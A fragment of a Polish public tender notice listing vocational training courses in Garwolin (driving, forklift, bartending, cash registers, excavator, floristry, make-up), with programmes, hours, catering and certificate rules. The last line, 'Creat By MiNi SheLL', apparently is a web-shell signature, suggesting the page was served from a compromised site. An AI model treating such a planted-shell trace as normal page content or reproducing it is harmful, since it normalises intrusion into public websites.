<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs prawa jazdy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 obejmuje:
1/Kurs prawa jazdy kat. B dla 17 osób.
2/Kurs prawa jazdy kat B na samochodzie dostosowanym dla 1 osoby niepełnosprawnej.
3/Kurs prawa jazdy kat. C dla 1 osoby.
Ramowy program szkolenia:
Tematyka zajęć teoretycznych na kat. B:
-przepisy ruchu drogowego,
-technika kierowania,
-pierwsza pomoc,
-kryteria obowiązujące na egzaminie państwowym,
Tematyka zajęć praktycznych na kat. B:
-przygotowanie do jazdy,
-jazdę pasem ruchu,
-parkowanie skośne,
-parkowanie prostopadłe i równoległe,
-ruszanie na wzniesieniu,
-jazda w ruchu miejskim,

Tematyka zajęć teoretycznych na kat. C:
-przepisy ruchu drogowego,
-technika kierowania,
-obsługa pojazdów,
-zasady przewozu,
-pierwsza pomoc,
-kryteria obowiązujące na egzaminie państwowym,
Tematyka zajęć praktycznych na kat. C:
-przygotowanie do jazdy,
-jazdę pasem ruchu,
-parkowanie skośne,
-parkowanie prostopadłe i równoległe,
-ruszanie na wzniesieniu,
-jazda w ruchu miejskim.
Wymagania minimalne:
Dla kursu prawa jazdy kat. B min 30 godzin zajęć teoretycznych oraz 30 godzin zajęć praktycznych.
Dla kursu prawa jazdy kat. C min. 30 godzin zajęć teoretycznych oraz 20 godzin zajęć praktycznych. Przy czym godzina zajęć teoretycznych wynosi 45 min zaś godzina zajęć praktycznych 60 min. 
Wykonawca zobowiązany jest do sfinansowania badań lekarskich oraz pierwszego egzaminu  w WORD wszystkim uczestnikom kursu.
Catering dla uczestników podczas zajęć teoretycznych /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./.
Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanym do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia /tj. komputery posiadające oprogramowanie do przeprowadzenia egzaminu wewnętrznego/.
Wykonawca będzie dysponował najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs operatora wózków jezdniowych z bezpieczną wymianą butli gazowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 obejmuje kurs operatora wózków jezdniowych z bezpieczną wymianą butli gazowej dla 4 osób.
Ramowy program szkolenia: 
Program kursu powinien obejmować min.: 
a/praktyczną naukę jazdy i manewrowania osprzętem wózków,
b/program modułu kierowca wózka jezdniowego pod względem merytorycznym musi być zatwierdzony przez jednostkę wyznaczoną do nadzoru przez ministra właściwego do spraw gospodarki oraz zakończyć się egzaminem zorganizowanym zgodnie z warunkami użytkowania programów.
Wymagania minimalne:
Minimalna liczba godzin - 67, 2 razy w tygodniu po 4-6 godzin dziennie /z wyłączeniem dni świątecznych/. Jedna godzina rozumiana jest jako 45 minut.
Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematyczny związany z kursem, notes A4, długopis/.
Zamawiający wymaga, aby Wykonawca zorganizował i opłacił dla uczestników kursu badania lekarskie /w celu uzyskania zaświadczenia lekarskiego wystawionego przez lekarza uprawnionego do wykonywania badań profilaktycznych o braku przeciwwskazań do kierowania wózkiem jezdniowym/ oraz psychologiczne, w celu uzyskania orzeczenia psychologicznego o braku przeciwwskazań do kierowania wózkiem jezdniowym. Koszt badań Wykonawca wlicza do ogólnego kosztu kursu.
Catering dla uczestników szkolenia na zajęciach teoretycznych /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./. Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Sala powinna być wyposażona  w sprzęt audiowizualny typu: projektor, laptop, ekran, tablica typu flipchart.
Wykonawca będzie dysponował najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs barmański.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5 obejmuje kurs barmański dla 1 osoby.
Ramowy program szkolenia:
Na program składają się zajęcia praktyczne 80 % i teoretyczne 20%. Ramowy program szkolenia powinien obejmować:
1.Historia miksologii, najnowsze trendy.
2.Technologia napojów alkoholowych, towaroznawstwo alkoholowe.
3.Sylwetka barmana, charakterystyka pracy barmana w różnych typach lokali gastronomicznych.
4.Prezentacja sprzętu barmańskiego i typów szkła barowego.
5.Przyrządzanie drinków metodami shaking, string, throwing, building.
6.Przygotowywanie napojów mieszanych.
7.Przyrządzanie shotów warstwowych różnymi metodami.
8.Przyozdabianie drinków świeżymi owocami.
9.Barmaństwo molekularne.
10.Sposoby podawania tequila.
11.Obsługa gości.
12.Układanie karty koktajli, karty alkoholi, karty win.
13.Zarządzanie barem, zamówienia deliverycontrol.
14.Koncesja na sprzedaż alkoholu.
15.Dobry sprzęt barowy, zakup zasadność, wybór odpowiednich marek.
16. Psychologia sprzedaży, techniki zwiększania przychodu.
Wymagania minimalne:
Min. 120 godzin. Jedna godzina rozumiana jest jako 45 minut.
Zapewnione materiały dydaktyczne oraz podręcznik tematycznie związany z kursem, notes A4, długopis.
Catering dla uczestnika szkolenia herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp. Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki szkolenia z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia.
Wykonawca dopuszcza możliwość zrealizowania usługi poza miastem Garwolin /pow. Garwoliński/ w odległości do 80 km od miasta Garwolin.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs obsługi kas fiskalnych z komputerowym systemem sprzedaży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6 obejmuje  kurs obsługi kas fiskalnych z komputerowym systemem sprzedaży dla 3 osób.
Ramowy program szkolenia powinien obejmować: 
a. budowa kasy fiskalnej,
b. transakcje sprzedaży,
c. różne sposoby płatności
Wymagania minimalne:
Minimalna liczba godzin - 60, 2 razy w tygodniu po 4-6 godzin dziennie /z wyłączeniem dni świątecznych/. Jedna godzina rozumiana jest jako 45 minut.
Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematyczny związany z kursem, notes A4, długopis/. 
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./ Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Zapewnienie podczas zajęć niezbędnego sprzętu do przeprowadzenia kursu,  w ilości odpowiadającej liczbie uczestników i stanie technicznym  gwarantującym odpowiedni poziom kursu. Sala powinna być wyposażona dodatkowo w sprzęt audiowizualny typu: projektor, laptop, ekran, tablica typu flipchart. Wykonawca będzie dysponował najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs operator koparko-ładowarki dla 3 osób niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7 obejmuje kurs operator koparko-ładowarki kl. III dla 3 osób niepełnosprawnych.
Ramowy program szkolenia: Program szkolenia  musi zawierać m.in. następujące zagadnienia:
1.część teoretyczna, obejmuje zagadnienia z zakresu:
a/dokumentacja techniczna maszyn roboczych,
b/bezpieczeństwo i higiena pracy przy eksploatacji maszyn roboczych,
c/technologii wykonywania robót ziemnych,
d/użytkowania i obsługi maszyn roboczych.
2.część praktyczna obejmująca naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i technologicznych.
Program szkolenia winien być zgodny z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych budowlanych i drogowych /Dz. U. Nr 118, poz.1263/.
Wymagania minimalne:
Minimalna liczba godzin-202 godz. Jedna godzina rozumiana jest jako 45 minut. Kurs zostanie przeprowadzony w trybie weekendowym.
Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematycznie związany z kursem, notes A4, długopis/.
Zapewnienie badań lekarskich niezbędnych do przeprowadzenia kursu.
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./ Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Wykonawca dopuszcza możliwość zrealizowania usługi poza miastem Garwolin /pow. Garwoliński/ w odległości do 80 km od miasta Garwolin. 
W przypadku realizowania kursu poza miastem Garwolin Wykonawca zapewnia nocleg i pełne wyżywienie /tj. śniadanie, obiad, kolację/ uczestnikom w czasie trwania kursu.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs florystyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8 obejmuje kurs florystyczny dla 1 osoby.
Ramowy program szkolenia: Program szkolenia powinien obejmować:
a/podstawowe wiadomości z anatomii i fizjologii roślin, 
b/rodzaj i przegląd roślin ozdobnych,
c/narzędzia i materiały pomocnicze, 
d/artykuły dekoracyjne, 
e/zasady nowoczesnej florystyki, 
zajęcia praktyczne: florystyka ślubna /bukiety w mikrofonie, przypinki, dekoracje stołów/, bukiety okrągłe spiralne, florystyka żałobna /wiązanka naręczna, na florecie tzw. wieniec/, kompozycje w naczyniach, wianuszki, kompozycje z kwiatów ciętych w koszu, układanie kwiatów, stroiki świąteczne, kompozycje z kwiatów suszonych.
Wymagania minimalne:
Minimalna liczba godzin - 80, 2 razy w tygodniu po 4-6 godzin dziennie /z wyłączeniem dni świątecznych/. Jedna godzina rozumiana jest jako 45 minut.
Zapewnione materiały dydaktyczne, niezbędne przybory i podręczniki /podręcznik tematyczny związany z kursem, notes A4, długopis/.
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./ Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestnika kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Zapewnienie podczas zajęć kwiatów żywych i sztucznych jak również wszystkich innych akcesoriów niezbędnych do tworzenia kompozycji.  
Wykonawca będzie dysponował najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs wizażu z elementami stylizacji paznokci dla 3 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 9 obejmuje kurs wizażu z elementami stylizacji paznokci dla 3 osób.
Ramowy program szkolenia: Minimalny program ramowy powinien zawierać m.in.
a/specyfikacja pracy wizażysty, 
b/kosmetyka pielęgnacyjna,
c/kosmetyka kolorowa,
d/rodzaje kosmetyków i omówienie technik aplikacji,
e/analiza anatomicznej budowy twarzy, oka, nosa,
f/makijaż korekcyjny,
g/teoria analizy kolorystycznej - opis czterech typów urody,
h/modelowanie brwi, 
i/makijaż francuski, 
j/makijaż klasyczny,
k/makijaż wielobarwny,
l/makijaż wieczorowy, 
m/makijaż ślubny,
n/Manicure kosmetyczny,
o/Pedicure kosmetyczny,
p/Manicure hybrydowy.
Wymagania minimalne: Minimalna liczba godzin-100. Kurs zostanie przeprowadzony w trybie weekendowym. Jedna godzina rozumiana jest jako 45 minut.
Wykonawca zapewni materiały dydaktyczne, niezbędne przybory i podręcznik /podręcznik tematycznie związany z kursem, notes A4, długopis/.
W cenie kursu wykonawca zapewni każdemu uczestnikowi kuferek startowy /zestaw kosmetyków do wykonywania podstawowych ćwiczeń z zakresu kursu/ w którym powinny znajdować się: 
a/kuferek na kosmetyki
b/profesjonalne pędzle do makijażu w etui -min. 10 szt.,
c/tonik,
d/płyn do demakijażu,
e/mini paleta pomadek - 1 szt. /różne odcienie/,
f/błyszczyk - 4 szt. /różne odcienie/,
g/baza pod podkład - min. 2 szt.,
h/korektor pod oczy - min. 1 szt.,
i/paleta 10 cieni do powiek - 1 szt.,
j/fluid w różnych odcieniach- min.3 szt.
k/Akcesoria do pielęgnacji paznokci
l/Lakiery do malowania paznokci-min.8 szt.
Catering dla uczestników szkolenia /herbata, kawa, soki owocowe, woda mineralna w małych butelkach gazowana i niegazowana, ciastka, paluszki solone itp./. Dodatkowo wykonawca zobowiązany jest do zapewnienia jednego posiłku ciepłego każdorazowo dla uczestników kursu /w którego skład będzie wchodzić danie główne mięsne lub rybne, ziemniaki/ryż/frytki oraz zestaw surówek/. Posiłki nie mogą być podawane w sali szkoleniowej.
Dysponowanie najpóźniej na dzień podpisania umowy obiektem szkoleniowym znajdującym się na terenie miasta Garwolin.
Wykonawca zobowiązany jest do sporządzenia i wydania Zamawiającemu zaświadczeń o ukończeniu kursu, które w swojej treści musi zawierać minimum niżej wymienione elementy, o ile przepisy odrębne nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie lub zaświadczenie zgodne z wzorem określonym w treści § 18 ust.2 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych dołączając do niego suplement zawierający: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych, numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenia. Ponadto uczestnicy szkolenia po pozytywnym ukończeniu kursu muszą otrzymać także zaświadczenie/certyfikaty o ukończeniu kursu opieczętowane logotypami Programu Operacyjnego Kapitał Ludzki, Flagi Unii Europejskiej z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego oraz informacją o współfinansowaniu.
Wykonawca zobowiązany jest do prowadzenia niezbędnej dokumentacji zgodnie z zasadami promocji projektu, w tym:
- dziennik zajęć edukacyjnych, 
- harmonogram,
- listy obecności,
-lista potwierdzająca odbiór materiałów szkoleniowych, 
- lista potwierdzająca odbiór wydanych zaświadczeń,
-lista potwierdzająca odbiór cateringu, 
-xero polisy ubezpieczeniowej, 
-zdjęcia dokumentujące zajęcia, 
-sprawozdanie z przeprowadzonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
